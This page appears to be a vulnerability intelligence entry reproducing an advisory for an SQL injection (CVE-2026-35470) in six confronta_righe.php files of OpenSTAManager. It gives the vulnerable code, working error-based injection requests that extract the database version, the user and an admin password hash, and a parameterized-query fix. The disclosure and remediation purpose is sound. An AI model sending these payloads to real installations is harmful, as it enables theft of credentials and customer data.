Deploy autonomous AI agents that reason, exploit, and validate complex vulnerability chains — not another scanner, an agentic system that thinks like a senior pentester.
CVE-2026-35470 is a low severity vulnerability with a CVSS score of 0.0. No known exploits currently, and patches are available.
Very low probability of exploitation
EPSS predicts the probability of exploitation in the next 30 days based on real-world threat data, complementing CVSS severity scores with actual risk assessment.
Six confronta_righe.php files across different modules in OpenSTAManager <= 2.10.1 contain an SQL Injection vulnerability. The righe parameter received via $_GET['righe'] is directly concatenated into an SQL query without any sanitization, parameterization or validation.
An authenticated attacker can inject arbitrary SQL statements to extract sensitive data from the database, including user credentials, customer information, invoice data and any other stored data.
All 6 vulnerable files share the same code pattern:
| # | File | Line | Affected Table |
|---|------|------|----------------|
| 1 | modules/fatture/modals/confronta_righe.php | 29 | co_righe_documenti |
| 2 | modules/interventi/modals/confronta_righe.php | 29 | in_righe_interventi |
| 3 | modules/preventivi/modals/confronta_righe.php | 28 | co_righe_preventivi |
| 4 | modules/ordini/modals/confronta_righe.php | 29 | or_righe_ordini |
| 5 | modules/ddt/modals/confronta_righe.php | 29 | dt_righe_ddt |
| 6 | modules/contratti/modals/confronta_righe.php | 28 | co_righe_contratti |
All files follow the same pattern. Example from modules/interventi/modals/confronta_righe.php:
$righe = $_GET['righe']; // Line 29 — No sanitization
$righe = $dbo->fetchArray(
'SELECT
`mg_articoli_lang`.`title`,
`mg_articoli`.`codice`,
`in_righe_interventi`.*
FROM
`in_righe_interventi`
INNER JOIN `mg_articoli` ON `mg_articoli`.`id` = `in_righe_interventi`.`idarticolo`
LEFT JOIN `mg_articoli_lang` ON (...)
WHERE
`in_righe_interventi`.`id` IN ('.$righe.')' // Line 41 — Direct concatenation
);
The value of $_GET['righe'] is inserted directly into the SQL IN() clause without using prepare(), parameterized statements or any sanitization function.
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT VERSION())))%23
Result: XPATH syntax error: '~8.3.0'
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT USER())))%23
Result: XPATH syntax error: '[email protected]'
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1) AND EXTRACTVALUE(1,CONCAT(0x7e,(SELECT CONCAT(username,0x3a,password) FROM zz_users LIMIT 1)))%23
Result: XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'
GET /modules/interventi/modals/confronta_righe.php?id_module=3&id_record=1&righe=1)%20AND%20EXTRACTVALUE(1,CONCAT(0x7e,(SELECT%20CONCAT(username,0x3a,password)%20FROM%20zz_users%20LIMIT%201)))%23 HTTP/1.1
Host: <TARGET>
Cookie: PHPSESSID=<SESSION_ID>
SQLSTATE[HY000]: General error: 1105 XPATH syntax error: '~admin:$2y$10$qAo04wNbhR9cpxjHzr'
Use parameterized statements with prepare() for the righe parameter:
// BEFORE (vulnerable):
$righe = $_GET['righe'];
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$righe.')'
);
// AFTER (secure):
$righe_ids = array_map('intval', explode(',', $_GET['righe'] ?? ''));
$placeholders = implode(',', array_fill(0, count($righe_ids), '?'));
$righe = $dbo->fetchArray(
'... WHERE `in_righe_interventi`.`id` IN ('.$placeholders.')',
$righe_ids
);
This fix must be applied to all 6 files listed in the "Affected Files" section.
Omar Ramirez
Please cite this page when referencing data from Strobes VI. Proper attribution helps support our vulnerability intelligence research.